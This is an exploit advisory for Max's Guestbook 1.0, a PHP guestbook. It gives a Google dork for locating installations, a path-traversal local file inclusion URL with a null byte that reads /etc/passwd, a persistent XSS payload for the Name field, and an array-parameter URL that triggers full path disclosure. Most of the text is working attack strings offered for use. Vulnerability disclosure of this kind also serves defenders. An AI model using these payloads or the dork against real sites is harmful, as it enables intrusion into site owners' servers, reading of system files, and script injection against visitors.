Max's Guestbook version 1.0 suffers from path disclosure and local file inclusion vulnerabilities.
b9b523de9c2261e48feaa347895bf53bf393e2e05b6eb7a951fd4ee84dd02834
# Exploit Title: Maxs Guestbook
# Google Dork: "Powered by PHP F1"
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://www.phpf1.com/download.html?dl=18
# Version: 1.0
# Tested on: Windows 7 / Linux(Ubuntu)
+[-- LFI --]+
http://localhost/max/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd%00
+[-- Persistent XSS --]+
Vulnerable Field = "Name"
Payload syntax: <script>alert('hello')</
script>
+[-- FPD --]+
http://localhost/max/index.php?page[]=2
+[-- Shoutz --]+
All the belegit crew..